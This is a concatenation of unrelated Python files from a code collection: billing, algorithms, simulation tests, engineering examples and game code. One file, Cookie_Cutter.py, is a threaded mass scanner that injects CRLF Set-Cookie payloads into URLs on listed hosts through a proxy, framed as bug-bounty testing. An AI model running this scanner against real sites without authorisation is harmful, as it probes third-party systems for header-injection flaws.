logging.info('customer id %s POST_PAY' % customer.id)
else:
logging.error('customer id %s dont have valid method pay' % customer.id)
sys.exit()
if __name__ == '__main__':
set_logging()
accountcode = sys.argv[1].strip()
destination = sys.argv[2].strip()
timeout = 45
database = TurboDb()
customer = database.get_customer_by_accountcode(accountcode)
if not customer:
logging.error('customer not found')
sys.exit()
check_credit(customer)
#TODO
#Not yet implement
#if customer.customer_id:
#check reseller credit
# reseller = database.get_customer_by_id(customer.customer_id)
# check_credit(reseller)
#check route
routes = database.get_routes_to_customer(customer, destination)
if not routes:
logging.error('routes not found')
sys.exit()
#dialer call
agi = AGI()
dialer = dialer(agi)
for r in routes:
price = database.get_price_customer_route(r)
agi.verbose(price)
if customer.type_pay == PRE_PAY:
limit = int(customer.credit /(price / 60) * 1000)
else:
limit = 10000000
str_provider = 'SIP/%s@%s_provider,%s' % (destination, r.Provider.id, timeout)
op_dial = '|L(%s:0:0),90' % (limit)
str_dial = str_provider + op_dial
d_status = dialer.dial(str_dial)
database.save_call(destination, customer, r, d_status, price)
if d_status['dialstatus'] in ['NOANSWER', 'CANCEL'] :
break
elif d_status['dialstatus'] in ['ANSWER']:
break
elif d_status['dialstatus'] in ['CHANUNAVAIL', 'CONGESTION', 'BUSY']:
continue
sys.exit()
| 2.3125
| 2
|
Python/Cracking the Coding Interview/Chapter 1_Arrays and Strings/1.6.py
|
honghaoz/Interview-Algorithm-in-Swift
| 1
|
12783515
|
# Given an image represented by NxN matrix,
# where each pixel in the image is 4 bytes,
# write a method to rotate the image by 90 degrees,
# In place?
# In place
from math import ceil
def rotate(m):
degree = len(m)
# Precondition
for eachLine in m:
if not degree == len(eachLine):
return False
# layer by layer
for i in xrange(int(ceil(degree / 2.0))):
for y in xrange(degree - i * 2 - 1):
j = y + i
# i stands for layer
# j stands for index
m[i][j], m[j][degree - 1 - i] = m[j][degree - 1 - i], m[i][j]
m[i][j], m[degree - 1 - i][degree - 1 - j] = m[degree - 1 - i][degree - 1 - j], m[i][j]
m[i][j], m[degree - 1 - j][i] = m[degree - 1 - j][i], m[i][j]
return m
# Helper
def printMatrix(m):
degree = len(m)
# Precondition
for eachLine in m:
if not degree == len(eachLine):
return False
for row in xrange(degree):
print m[row]
def test():
matrix1 = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]]
matrix1Rotated = [[13, 9, 5, 1],
[14, 10, 6, 2],
[15, 11, 7, 3],
[16, 12, 8, 4]]
matrix2 = [[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10],
[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25]]
matrix2Rotated = [[21, 16, 11, 6, 1],
[22, 17, 12, 7, 2],
[23, 18, 13, 8, 3],
[24, 19, 14, 9, 4],
[25, 20, 15, 10, 5]]
print "Passed" if rotate(matrix1) == matrix1Rotated else "Failed"
print "Passed" if rotate(matrix2) == matrix2Rotated else "Failed"
test()
| 3.5
| 4
|
anuga/parallel/tests/test_sequential_dist_sw_flow.py
|
samcom12/anuga_core
| 136
|
12783516
|
<reponame>samcom12/anuga_core
"""
Simple water flow example using ANUGA
Water driven up a linear slope and time varying boundary,
similar to a beach environment
This is a very simple test of the parallel algorithm using the simplified parallel API
"""
from __future__ import print_function
from __future__ import division
#------------------------------------------------------------------------------
# Import necessary modules
#------------------------------------------------------------------------------
from past.utils import old_div
from future.utils import raise_
import unittest
import os
import sys
#import pypar
import numpy as num
import anuga
from anuga import Domain
from anuga import Reflective_boundary
from anuga import Dirichlet_boundary
from anuga import Time_boundary
from anuga import Transmissive_boundary
from anuga import rectangular_cross_domain
from anuga import distribute, myid, numprocs, send, receive, barrier, finalize
from anuga.parallel.sequential_distribute import sequential_distribute_dump
from anuga.parallel.sequential_distribute import sequential_distribute_load
import anuga.utilities.plot_utils as util
#--------------------------------------------------------------------------
# Setup parameters
#--------------------------------------------------------------------------
yieldstep = 0.25
finaltime = 1.0
nprocs = 4
N = 29
M = 29
verbose = False
new_parameters = {}
new_parameters['ghost_layer_width'] = 2
#---------------------------------
# Setup Functions
#---------------------------------
def topography(x,y):
return old_div(-x,2)
###########################################################################
# Setup Test
##########################################################################
def run_simulation(parallel=False, verbose=False):
#--------------------------------------------------------------------------
# Setup computational domain and quantities
#--------------------------------------------------------------------------
if myid == 0:
domain = rectangular_cross_domain(M, N)
domain.set_name('odomain') # Set sww filename
domain.set_datadir('.')
domain.set_quantity('elevation', topography) # Use function for elevation
domain.set_quantity('friction', 0.0) # Constant friction
domain.set_quantity('stage', expression='elevation') # Dry initial stage
else:
domain = None
#--------------------------------------------------------------------------
# Create pickled partition
#--------------------------------------------------------------------------
if myid == 0:
if verbose: print('DUMPING PARTITION DATA')
sequential_distribute_dump(domain, numprocs, verbose=verbose, parameters=new_parameters)
#--------------------------------------------------------------------------
# Create the parallel domains
#--------------------------------------------------------------------------
if parallel:
if myid == 0 and verbose : print('DISTRIBUTING TO PARALLEL DOMAIN')
pdomain = distribute(domain, verbose=verbose, parameters=new_parameters)
pdomain.set_name('pdomain')
if myid == 0 and verbose : print('LOADING IN PARALLEL DOMAIN')
sdomain = sequential_distribute_load(filename='odomain', verbose = verbose)
sdomain.set_name('sdomain')
if myid == 0 and verbose: print('EVOLVING pdomain')
setup_and_evolve(pdomain, verbose=verbose)
if myid == 0 and verbose: print('EVOLVING sdomain')
setup_and_evolve(sdomain, verbose=verbose)
if myid == 0:
if verbose: print('EVOLVING odomain')
setup_and_evolve(domain, verbose=verbose)
if myid == 0 and verbose:
parameter_file=open('odomain.txt', 'w')
from pprint import pprint
pprint(domain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
parameter_file=open('sdomain.txt', 'w')
from pprint import pprint
pprint(sdomain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
parameter_file=open('pdomain.txt', 'w')
from pprint import pprint
pprint(pdomain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
assert num.allclose(pdomain.quantities['stage'].centroid_values, sdomain.quantities['stage'].centroid_values)
assert num.allclose(pdomain.quantities['stage'].vertex_values, sdomain.quantities['stage'].vertex_values)
assert num.allclose(pdomain.vertex_coordinates, sdomain.vertex_coordinates)
assert num.allclose(pdomain.centroid_coordinates, sdomain.centroid_coordinates)
#---------------------------------
# Now compare the merged sww files
#---------------------------------
if myid == 0:
if verbose: print('COMPARING SWW FILES')
odomain_v = util.get_output('odomain.sww')
odomain_c = util.get_centroids(odomain_v)
pdomain_v = util.get_output('pdomain.sww')
pdomain_c = util.get_centroids(pdomain_v)
sdomain_v = util.get_output('sdomain.sww')
sdomain_c = util.get_centroids(sdomain_v)
# Test some values against the original ordering
if verbose:
order = 2
print('PDOMAIN CENTROID VALUES')
print(num.linalg.norm(odomain_c.x-pdomain_c.x,ord=order))
print(num.linalg.norm(odomain_c.y-pdomain_c.y,ord=order))
print(num.linalg.norm(odomain_c.stage[-1]-pdomain_c.stage[-1],ord=order))
print(num.linalg.norm(odomain_c.xmom[-1]-pdomain_c.xmom[-1],ord=order))
print(num.linalg.norm(odomain_c.ymom[-1]-pdomain_c.ymom[-1],ord=order))
print(num.linalg.norm(odomain_c.xvel[-1]-pdomain_c.xvel[-1],ord=order))
print(num.linalg.norm(odomain_c.yvel[-1]-pdomain_c.yvel[-1],ord=order))
print('SDOMAIN CENTROID VALUES')
print(num.linalg.norm(odomain_c.x-sdomain_c.x,ord=order))
print(num.linalg.norm(odomain_c.y-sdomain_c.y,ord=order))
print(num.linalg.norm(odomain_c.stage[-1]-sdomain_c.stage[-1],ord=order))
print(num.linalg.norm(odomain_c.xmom[-1]-sdomain_c.xmom[-1],ord=order))
print(num.linalg.norm(odomain_c.ymom[-1]-sdomain_c.ymom[-1],ord=order))
print(num.linalg.norm(odomain_c.xvel[-1]-sdomain_c.xvel[-1],ord=order))
print(num.linalg.norm(odomain_c.yvel[-1]-sdomain_c.yvel[-1],ord=order))
print('PDOMAIN VERTEX VALUES')
print(num.linalg.norm(odomain_v.stage[-1]-pdomain_v.stage[-1],ord=order))
print(num.linalg.norm(odomain_v.xmom[-1]-pdomain_v.xmom[-1],ord=order))
print(num.linalg.norm(odomain_v.ymom[-1]-pdomain_v.ymom[-1],ord=order))
print(num.linalg.norm(odomain_v.xvel[-1]-pdomain_v.xvel[-1],ord=order))
print(num.linalg.norm(odomain_v.yvel[-1]-pdomain_v.yvel[-1],ord=order))
print('SDOMAIN VERTEX VALUES')
print(num.linalg.norm(odomain_v.stage[-1]-sdomain_v.stage[-1],ord=order))
print(num.linalg.norm(odomain_v.xmom[-1]-sdomain_v.xmom[-1],ord=order))
print(num.linalg.norm(odomain_v.ymom[-1]-sdomain_v.ymom[-1],ord=order))
print(num.linalg.norm(odomain_v.xvel[-1]-sdomain_v.xvel[-1],ord=order))
print(num.linalg.norm(odomain_v.yvel[-1]-sdomain_v.yvel[-1],ord=order))
assert num.allclose(odomain_c.stage,pdomain_c.stage)
assert num.allclose(odomain_c.xmom,pdomain_c.xmom)
assert num.allclose(odomain_c.ymom,pdomain_c.ymom)
assert num.allclose(odomain_c.xvel,pdomain_c.xvel)
assert num.allclose(odomain_c.yvel,pdomain_c.yvel)
assert num.allclose(odomain_v.x,pdomain_v.x)
assert num.allclose(odomain_v.y,pdomain_v.y)
assert num.linalg.norm(odomain_v.x-pdomain_v.x,ord=0) == 0
assert num.linalg.norm(odomain_v.y-pdomain_v.y,ord=0) == 0
assert num.linalg.norm(odomain_v.stage[-1]-pdomain_v.stage[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.xmom[-1]-pdomain_v.xmom[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.ymom[-1]-pdomain_v.ymom[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.xvel[-1]-pdomain_v.xvel[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.yvel[-1]-pdomain_v.yvel[-1],ord=0) < 100
assert num.allclose(odomain_c.x,sdomain_c.x)
assert num.allclose(odomain_c.y,sdomain_c.y)
assert num.allclose(odomain_c.stage,sdomain_c.stage)
assert num.allclose(odomain_c.xmom,sdomain_c.xmom)
assert num.allclose(odomain_c.ymom,sdomain_c.ymom)
assert num.allclose(odomain_c.xvel,sdomain_c.xvel)
assert num.allclose(odomain_c.yvel,sdomain_c.yvel)
assert num.allclose(odomain_v.x,sdomain_v.x)
assert num.allclose(odomain_v.y,sdomain_v.y)
order = 0
assert num.linalg.norm(odomain_v.x-sdomain_v.x,ord=order) == 0
assert num.linalg.norm(odomain_v.y-sdomain_v.y,ord=order) == 0
assert num.linalg.norm(odomain_v.stage[-1]-sdomain_v.stage[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.xmom[-1]-sdomain_v.xmom[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.ymom[-1]-sdomain_v.ymom[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.xvel[-1]-sdomain_v.xvel[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.yvel[-1]-sdomain_v.yvel[-1],ord=order) < 100
# COMPARE CENTROID PDOMAIN SDOMAIN
assert num.allclose(pdomain_c.x,sdomain_c.x)
assert num.allclose(pdomain_c.y,sdomain_c.y)
assert num.allclose(pdomain_c.stage[-1],sdomain_c.stage[-1])
assert num.allclose(pdomain_c.xmom[-1],sdomain_c.xmom[-1])
assert num.allclose(pdomain_c.ymom[-1],sdomain_c.ymom[-1])
assert num.allclose(pdomain_c.xvel[-1],sdomain_c.xvel[-1])
assert num.allclose(pdomain_c.yvel[-1],sdomain_c.yvel[-1])
# COMPARE VERTEX PDOMAIN SDOMAIN
assert num.allclose(pdomain_v.x,sdomain_v.x)
assert num.allclose(pdomain_v.y,sdomain_v.y)
assert num.allclose(pdomain_v.stage[-1],sdomain_v.stage[-1])
assert num.allclose(pdomain_v.xmom[-1],sdomain_v.xmom[-1])
assert num.allclose(pdomain_v.ymom[-1],sdomain_v.ymom[-1])
assert num.allclose(pdomain_v.xvel[-1],sdomain_v.xvel[-1])
assert num.allclose(pdomain_v.yvel[-1],sdomain_v.yvel[-1])
import os
os.remove('odomain.sww')
os.remove('pdomain.sww')
os.remove('sdomain.sww')
os.remove('odomain_P3_0.pickle')
os.remove('odomain_P3_1.pickle')
os.remove('odomain_P3_2.pickle')
#os.remove('odomain_P4_3.pickle')
import glob
[ os.remove(fl) for fl in glob.glob('*.npy') ]
def setup_and_evolve(domain, verbose=False):
#--------------------------------------------------------------------------
# Setup domain parameters
#--------------------------------------------------------------------------
domain.set_flow_algorithm('DE0')
#domain.set_store_vertices_uniquely()
#------------------------------------------------------------------------------
# Setup boundary conditions
# This must currently happen *AFTER* domain has been distributed
#------------------------------------------------------------------------------
Br = Reflective_boundary(domain) # Solid reflective wall
Bd = Dirichlet_boundary([-0.2,0.,0.]) # Constant boundary values
# Associate boundary tags with boundary objects
domain.set_boundary({'left': Br, 'right': Bd, 'top': Br, 'bottom': Br})
#------------------------------------------------------------------------------
# Evolve
#------------------------------------------------------------------------------
for t in domain.evolve(yieldstep = yieldstep, finaltime = finaltime):
if myid == 0 and verbose : domain.write_time()
#if myid == 0 and verbose : print domain.quantities['stage'].get_maximum_value()
domain.sww_merge(delete_old=True)
# Test an nprocs-way run of the shallow water equations
# against the sequential code.
class Test_parallel_sw_flow(unittest.TestCase):
def test_parallel_sw_flow(self):
if verbose : print("Expect this test to fail if not run from the parallel directory.")
cmd = anuga.mpicmd(os.path.abspath(__file__))
result = os.system(cmd)
assert_(result == 0)
# Because we are doing assertions outside of the TestCase class
# the PyUnit defined assert_ function can't be used.
def assert_(condition, msg="Assertion Failed"):
if condition == False:
#pypar.finalize()
raise_(AssertionError, msg)
if __name__=="__main__":
if numprocs == 1:
runner = unittest.TextTestRunner()
suite = unittest.makeSuite(Test_parallel_sw_flow, 'test')
runner.run(suite)
else:
from anuga.utilities.parallel_abstraction import global_except_hook
import sys
sys.excepthook = global_except_hook
#------------------------------------------
# Run the codel and compare sequential
# results at 4 gauge stations
#------------------------------------------
if myid ==0 and verbose: print('PARALLEL START')
run_simulation(parallel=True, verbose=verbose)
finalize()
| 2.65625
| 3
|
Examples/example.py
|
lorcan2440/SimpleTrussCalculator
| 1
|
12783517
|
<filename>Examples/example.py
import _import_helper # noqa
from Source import Truss_Calculator as tc
'''
It is recommended to use the factory functions to build trusses (Example 1).
However, it is also possible to directly create the objects using classes (Example 2).
'''
#########################################################
# Example 1: Building a truss using factory functions #
#########################################################
# set some initial parameters
default_bar_params = {"b": 16, "t": 1.1, "D": 5, "E": 210, "strength_max": 0.216}
units_system = 'kN, mm'
# initialise a truss (and set it as the active truss)
tc.init_truss('My First Truss', default_bar_params, units_system)
# create the joints: name, x, y
tc.create_joint('A', 0, 0)
tc.create_joint('B', 0, 100)
tc.create_joint('C', 100, 0)
tc.create_joint('D', 100, 100)
tc.create_joint('E', 200, 0)
tc.create_joint('F', 200, 100)
# create the bars: name, *between_which_joints_names
tc.create_bar('AB', 'A', 'B')
tc.create_bar('AC', 'A', 'C')
tc.create_bar('AD', 'A', 'D')
tc.create_bar('BD', 'B', 'D')
tc.create_bar('CD', 'C', 'D')
tc.create_bar('CE', 'C', 'E')
tc.create_bar('DE', 'D', 'E')
tc.create_bar('DF', 'D', 'F')
tc.create_bar('EF', 'E', 'F')
# apply loads: name, joint, x, y
tc.create_load('W', 'D', 0, -100)
# put supports at joints: name, joint, type
tc.create_support('A', 'A', 'pin')
tc.create_support('E', 'E', 'roller', roller_normal=(0, 1))
# make calculations and get results of analysis
my_results = tc.active_truss.Result(tc.active_truss, sig_figs=3, solution_method=tc.SolveMethod.SCIPY)
# show the results in text form
print(my_results)
# get e.g. force and stress in a specific bar
print(tc.active_truss.results['internal_forces']['AD']) # unrounded
print(tc.active_truss.results['stresses']['AD'])
print(my_results.tensions['AD']) # rounded
print(my_results.stresses['AD'])
# show the results in graphical form. If we may want to use this truss again (e.g. in Example 3)
# then we must set _delete_truss_after = False.
tc.plot_diagram(tc.active_truss, my_results, show_reactions=True, _delete_truss_after=False)
###############################################
# Example 2: Building a truss using objects #
###############################################
# initialise a truss (and set it as the active truss).
# NOTE: if the var_name argument is omitted, there can be issues with saving/loading.
my_truss = tc.Truss('My Second Truss', default_bar_params, units_system, var_name='my_truss')
# create the joints: truss object, name, x, y
joint_a = my_truss.Joint(my_truss, 'A', 0, 0)
joint_b = my_truss.Joint(my_truss, 'B', 0, 100)
joint_c = my_truss.Joint(my_truss, 'C', 100, 0)
joint_d = my_truss.Joint(my_truss, 'D', 100, 100)
joint_e = my_truss.Joint(my_truss, 'E', 200, 0)
joint_f = my_truss.Joint(my_truss, 'F', 200, 100)
# create the bars: truss, name, *between_which_joints_objects
bar_ab = my_truss.Bar(my_truss, 'AB', joint_a, joint_b)
bar_ac = my_truss.Bar(my_truss, 'AC', joint_a, joint_c)
bar_ad = my_truss.Bar(my_truss, 'AD', joint_a, joint_d)
bar_bd = my_truss.Bar(my_truss, 'BD', joint_b, joint_d)
bar_cd = my_truss.Bar(my_truss, 'CD', joint_c, joint_d)
bar_ce = my_truss.Bar(my_truss, 'CE', joint_c, joint_e)
bar_de = my_truss.Bar(my_truss, 'DE', joint_d, joint_e)
bar_df = my_truss.Bar(my_truss, 'DF', joint_d, joint_f)
bar_ef = my_truss.Bar(my_truss, 'EF', joint_e, joint_f)
# apply loads: name, joint object, x, y
load_w = my_truss.Load('W', joint_d, 0, -100)
# put supports at joints: name, joint, type
support_a = my_truss.Support('A', joint_a, 'pin')
support_e = my_truss.Support('E', joint_e, 'roller', (0, 1))
# make calculations and get results of analysis
my_results = my_truss.Result(my_truss, sig_figs=3, solution_method=tc.SolveMethod.SCIPY)
# show the results in text form
print(my_results)
# show the results in graphical form. If we may want to use this truss again (e.g. in Example 3)
# then we must set _delete_truss_after = False.
tc.plot_diagram(my_truss, my_results, show_reactions=True, _delete_truss_after=False)
###################################
# Example 3: Saving and loading #
###################################
# NOTE: saving and loading does not work on trusses created using objects,
# unless a var_name is specified when initialising the truss.
tc.active_truss.dump_truss_to_json('./Saved Trusses')
my_truss.dump_truss_to_json('./Saved Trusses')
tc.load_truss_from_json('./Saved Trusses/my_first_truss.json') # load truss from Example 1
tc.load_truss_from_json('./Saved Trusses/my_truss.json') # load truss from Example 2
| 3.296875
| 3
|
function1.py
|
shreya-n-kumari/python
| 0
|
12783518
|
<filename>function1.py
#Defining and Calling the Function in Python Script.
def list_product(my_list):
result = 1
for number in my_list:
result = result * number
return result
print(list_product([2, 3]))
print(list_product([2, 10, 15]))
def add_suffix(suffix = '.com'):
return 'google' + suffix
print(add_suffix()) #without specifying argument(default argument).
print(add_suffix('.nic.in')) #with argument.
| 3.734375
| 4
|
Cookie_Cutter.py
|
devcoinfet/Cookie_Inject0r
| 0
|
12783519
|
<reponame>devcoinfet/Cookie_Inject0r
import requests
import uuid
import subprocess
import os
import sys
import binascii
import json
from urllib3.exceptions import InsecureRequestWarning
from threading import Thread, Lock
from multiprocessing import Process, cpu_count
import telegram
from urllib.parse import urlparse
import glob
import time
import ast
#token that can be generated talking with @BotFather on telegram
api_token = '<PASSWORD>'
chat_ids = ['chatisgoeshere']#,'@yourbotname']
session_proxied = requests.Session()
session_proxied.proxies = {
"http": "http://ilike_2rotate@proxyhost.com:80",
}
PROCESS = cpu_count() * 2
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
THREADS = 4
lock = Lock()
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
false_positives = ['handl_landing_page','handl_url',
'handl_url','REQUEST','uri','URI','landingpage','Set-Cookie:']
vuln_cookies_found = []
def get_ips(dataset_path):
ips = []
file = open(dataset_path, "r")
dataset = list(filter(None, file.read().split("\n")))
for line in dataset:
# line = json.loads(line)
# ips.append(line['IP'])
ips.append(line.rstrip())
return ips
def ip_to_process(a, n):
# ode to devil the best coder i know ;)
k, m = divmod(len(a), n)
for i in range(n):
yield a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)]
def crlf_injection_tester(hosts_in):
for hosts in hosts_in:
domain = urlparse(hosts).netloc
cookie_scope = domain
cookie_rand = "BugBountyTestOnly"
url_pay = 'https://'+hosts+"/%0d%0aSet-Cookie:{}:{};domain={}".format(str(cookie_rand),str(cookie_rand),str(domain))
test_url = url_pay
try:
response = session_proxied.get(test_url,timeout=3,verify=False)
print(response.status_code)
if session_proxied.cookies:
cookies = session_proxied.cookies.get_dict()
for key in cookies.items():
if "__cfruid" or "__cfduid" in key:
print("We have a hit dodging WAF probably not Vuln")
pass
else:
for cook in key:
print(cook)
if cookie_rand in cook:
#todo check for false positive by looking for reflection in location type headrers
print("CRLF Injection Possibly Detected")
sys.exit()
tested_info = {}
tested_info['target_url'] = test_url
tested_info['cookie_set'] = cookie_rand
tested_info['cookies_returned'] = session_proxied.cookies.get_dict()
tested_info['is_vuln'] = True
vuln_cookies_found.append(json.dumps(tested_info))
print(json.dumps(tested_info))
try:
for chat_id in chat_ids:
#send_notification(tested_info,chat_id)
print("Mock Send")
except Exception as ex1:
print(ex1)
pass
else:
#print(json.dumps(tested_info))
pass
except Exception as issues:
print(str(issues))
pass
def send_notification(msg, chat_id, token=api_token):
"""
Send a mensage to a telegram user specified on chatId
chat_id must be a number!
"""
try:
bot = telegram.Bot(token=token)
bot.sendMessage(chat_id=chat_id, text=msg)
except Exception as ex:
print(ex)
pass
if __name__ == "__main__":
ip_list = get_ips(sys.argv[1])
ips = ip_to_process(ip_list, PROCESS)
for _ in range(PROCESS):
p = Thread(target=crlf_injection_tester, args=(next(ips),))
p.daemon = True
p.start()
for _ in range(PROCESS):
p.join()
for result in vuln_cookies_found:
print(result)
| 2
| 2
|
wsdet/modules/models/base/assigner/builder.py
|
DetectionBLWX/WSDDN.pytorch
| 7
|
12783520
|
'''
Function:
builder the assigner
Author:
<NAME>
'''
from .maxiouassigner import MaxIoUAssigner
'''builder the assigner'''
def BuildAssigner(cfg, **kwargs):
supported_assigners = {
'max_iou': MaxIoUAssigner,
}
assert cfg['type'] in supported_assigners, 'unsupport assigner type %s...' % cfg['type']
return supported_assigners[cfg['type']](**cfg['opts'])
| 2.390625
| 2
|
Classes_and_Object_Programs/cls1.py
|
saratkumar17mss040/Python-lab-programs
| 3
|
12783521
|
# simple class - general class -1
class StudentDetails:
name = 'sam'
age = 21
college = 'ABC'
average = 9.2
# class StudentDetails object
s1 = StudentDetails()
print('Student details')
print('Name:',s1.name)
print('Age:', s1.age)
print('College', s1.college)
print('Average', s1.average)
| 3.90625
| 4
|
screen/title.py
|
wooky/xtremettt
| 0
|
12783522
|
import pygame, assets
from options import OptionsScreen
class TitleScreen:
def __init__(self, screen):
self.screen = screen
big_font = pygame.font.SysFont(assets.font, 90)
small_font = pygame.font.SysFont(assets.font, 24)
self.heading = small_font.render("Super Extreme", True, (255,255,255))
self.title = big_font.render("TIC-TAC-TOE", True, (255,255,255))
self.title_shadow = big_font.render("TIC-TAC-TOE", True, (192,192,192))
self.start = small_font.render("Press ENTER to start!", True, (255,255,255))
self.title_shadow_rect = self.title_shadow.get_rect()
self.title_shadow_rect.center = (screen.get_width()/2, screen.get_height()/2)
self.title_rect = self.title_shadow_rect.move(-10, -10)
self.heading_rect = self.heading.get_rect()
self.heading_rect.topleft = self.title_rect.topleft
self.heading_rect.left -= 5
self.start_rect = self.start.get_rect()
self.start_rect.center = (self.title_shadow_rect.centerx, (self.title_rect.bottom + screen.get_height())/2)
def event(self, event):
if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
OptionsScreen.instance = OptionsScreen(self.screen)
return OptionsScreen.instance
else: return self
def logic(self):
assets.background.logic()
def draw(self):
self.screen.fill((0,0,0))
assets.background.draw()
self.screen.blit(self.title_shadow, self.title_shadow_rect)
self.screen.blit(self.title, self.title_rect)
self.screen.blit(self.heading, self.heading_rect)
self.screen.blit(self.start, self.start_rect)
| 2.875
| 3
|
moon.py
|
zhoudaxia233/icey
| 0
|
12783523
|
import random
import math
from PIL import Image
def sample(x, y, num_of_sample_directions=64):
s = 0.0
for i in range(num_of_sample_directions):
# random_rad = 2 * math.pi * random.uniform(0.0, 1.0)
random_rad = 2 * math.pi * (i + random.uniform(0.0, 1.0)) / num_of_sample_directions
s += trace(x, y, math.cos(random_rad), math.sin(random_rad))
return s / num_of_sample_directions # * 2 * math.pi
def trace(ox, oy, dx, dy):
t = 0.0
i = 0
while (i < 10) and (t < 2.0):
i += 1
sd = circleSDF(ox + dx * t, oy + dy * t, 0.5, 0.5, 0.1)
if sd < 1e-6: return 2.0
t += sd
return 0.0
def circleSDF(x, y, cx, cy, cr):
"""Return:
negative if (x, y) is inside the circle;
positive if (x, y) is outside the circle;
zero if (x, y) is on the circle
"""
return math.sqrt((x - cx) * (x - cx) + (y - cy) * (y - cy)) - cr
def main():
width, height = 512, 512
img = Image.new('L', (width, height))
pixels = img.load()
for h in range(height):
for w in range(width):
pixels[h, w] = int(min(sample(h / float(height), w / float(width)) * 255.0, 255.0))
img.save("moon2.png")
if __name__ == '__main__':
main()
| 2.84375
| 3
|
utils/mongodb.py
|
josemcorderoc/twitterconstituyente
| 0
|
12783524
|
from pymongo.errors import BulkWriteError
import logging
import time
import tqdm
import tweepy
logging.basicConfig(format='[%(asctime)s] - %(name)s - %(funcName)s - %(levelname)s : %(message)s', level=logging.INFO)
log = logging.getLogger(__name__)
def bulk_write_to_mongo(collection, data):
to_insert = len(data)
try:
if to_insert > 0:
collection.insert_many(data, ordered=False)
return to_insert, 0
except BulkWriteError as e:
log.error("BulkWriteError")
inserted = e.details["nInserted"]
return inserted, to_insert - inserted
def download_timeline(user_id: str, n: int = 3200, count: int = 200, trim_user=True, tweet_mode="extended", **kwargs):
log.info(f'Downloading timeline from user id: {user_id}')
start_time = time.time()
tweets = [status for status in tqdm.tqdm(tweepy.Cursor(
api.user_timeline,
user_id=user_id,
count=count,
trim_user=trim_user,
tweet_mode=tweet_mode,
**kwargs).items(n), total=n)]
total_time = time.time() - start_time
log.info(f"Downloaded finished: {len(tweets)} tweets in {total_time:.4f} seconds.")
return tweets
| 2.578125
| 3
|
main.py
|
VIVelev/Flappy-AI
| 3
|
12783525
|
<gh_stars>1-10
import numpy as np
from Game.main import Game
from NeuroEvolution.Population import Population
N_BIRDS = 15
MUTATION_RATE = 0.02
N_WINNERS = 2
pop = Population(N_BIRDS, MUTATION_RATE, n_winners=N_WINNERS)
game = Game(pop, n_birds=N_BIRDS)
game.run()
| 2.40625
| 2
|
basic/annotationtable.py
|
ChaitanyaArora/text2image
| 10
|
12783526
|
<reponame>ChaitanyaArora/text2image
import os
from common import ROOT_PATH
def niceName(qid):
return '0'if qid[1:-2] == '' else qid[1:-2]
def readAnnotations(inputfile, skip_0=True):
data = [(str.split(x)[0], int(str.split(x)[1])) for x in open(inputfile).readlines()]
names = [x[0] for x in data]
labels = [x[1] for x in data]
if skip_0:
idx = [i for i in range(len(names)) if labels[i] != 0]
names = [names[x] for x in idx]
labels = [labels[x] for x in idx]
return (names, labels)
def readAnnotationsFrom(collection, annotationName, concept, skip_0=True, rootpath=ROOT_PATH):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, concept + ".txt")
if not os.path.exists(annotationfile):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, niceName(concept), concept + ".txt")
return readAnnotations(annotationfile, skip_0)
def readConcepts(collection, annotationName, rootpath=ROOT_PATH):
conceptfile = os.path.join(rootpath, collection, "Annotations", annotationName)
return [x.strip() for x in open(conceptfile).readlines() if x.strip()]
def writeConcepts(concepts, resultfile):
try:
os.makedirs(os.path.split(resultfile)[0])
except Exception, e:
#print e
pass
fout = open(resultfile, "w")
fout.write("\n".join(concepts) + "\n")
fout.close()
def writeConceptsTo(concepts, collection, annotationName, rootpath=ROOT_PATH):
resultfile = os.path.join(rootpath, collection, "Annotations", annotationName)
writeConcepts(concepts, resultfile)
def writeAnnotations(names, labels, resultfile):
try:
os.makedirs(os.path.split(resultfile)[0])
except:
pass
fout = open(resultfile, "w")
fout.write("".join(["%s %g\n" % (im,lab) for (im,lab) in zip(names,labels)]))
fout.close()
def writeAnnotationsTo(names, labels, collection, annotationName, concept, rootpath=ROOT_PATH):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, concept + ".txt")
writeAnnotations(names, labels, annotationfile)
def readQueries(inputfile):
data = [ str.split(x, " ", 1) for x in open(inputfile).readlines()]
qids = [x[0] for x in data]
queries = [x[1].rstrip('\n') for x in data]
return (qids, queries)
def readQueriesFrom(collection, rootpath=ROOT_PATH):
queryfile = os.path.join(rootpath, collection, "Annotations", "qid.text.txt")
return readQueries(queryfile)
| 2.703125
| 3
|
src/copy_mechanism/copy_layer.py
|
Ravi-0809/question-generation
| 212
|
12783527
|
from typing import Callable
from tensorflow.python.layers import base
from tensorflow.python.eager import context
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import utils as layers_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import standard_ops
from tensorflow.contrib.layers import fully_connected
import tensorflow as tf
import sys
from helpers.misc_utils import debug_tensor, debug_shape
from helpers.ops import safe_log
